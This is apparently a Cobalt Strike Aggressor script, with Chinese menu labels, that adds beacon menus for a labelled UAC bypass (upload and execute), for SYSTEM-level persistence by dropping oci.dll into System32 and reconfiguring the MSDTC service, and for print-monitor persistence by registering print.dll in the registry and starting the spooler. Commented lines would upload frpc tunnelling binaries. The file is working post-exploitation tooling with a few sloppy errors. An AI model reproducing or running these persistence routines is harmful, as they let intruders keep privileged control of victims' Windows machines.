popup beacon_bottom {
    menu "UAC Bypass"{
        item "Upload" {
            $bid = $1;
            $dialog = dialog("CS上线文件", %(UploadPath => "C:\\Windows\\System32\\calc.exe", bid => $bid), &upload);
            drow_text($dialog, "UploadPath",  "path: ");
            dbutton_action($dialog, "Executing");
            dialog_show($dialog);
        }
        sub upload {
            # switch to specify path
            # bcd($bid, $3['UploadPath']);
            # bsleep($bid, 0 ,0);
            bshell($bid, $3['UploadPath']);
            # if (-is64 $bid['id']) {
            #     bupload($bid, script_resource("/script/x64/frpc.exe"));
            # }else{
            #     bupload($bid, script_resource("/script/x86/frpc.exe"));
            # }
            show_message("Executing cmmand!");
        }
    }
    menu "persistence" {
        menu "msdtc" {
        item "Mstdc安装" {
            $bid = $1;
            bcd($bid, "C:\\Windows\\System32");
            bupload($bid, script_resource("/source/oci.dll"))
            bshell($bid, "net stop msdtc");
            bshell($bid, "sc config msdtc obj= LocalSystem");
            bshell($bid, "sc config msdtc start= auto");
            bshell($bid, "net start msdtc");
        }
        item "Mstdc卸载" {
            $bid = $1;
            bshell($bid, "net stop msdtc");  
            bshell($bid, "del C:\\Windows\\System32\\oci.dll");
        }
        }
    }

    menu "Spool" {
        item "Spool安装" {
            $bid = $1;
            bcd($bid, "C:\\Windows\\System32");
            bupload($bid, script_resource("/source/print.dll"))
            bshell($bid, "reg add hklm\\system\\currentcontrolset\\control\\print\\monitors\\monitor /v Driver /d print.dll /t REG_SZ");

        }
        item "Spool触发" {
            $bid = $1;
            bshell($bid, "sc start spooler");  
        }

        item "Spool卸载" {
            $bid = $1;
            bshell($bid, "sc stop spooler");  
            bshell($bid, "reg delete hklm\\system\\currentcontrolset\\control\\print\\monitors\\monitor\\Driver /f");
            bshell($bid, "delete C:\\Windows\\System32\\print.dll")
        }
        }
    }
}
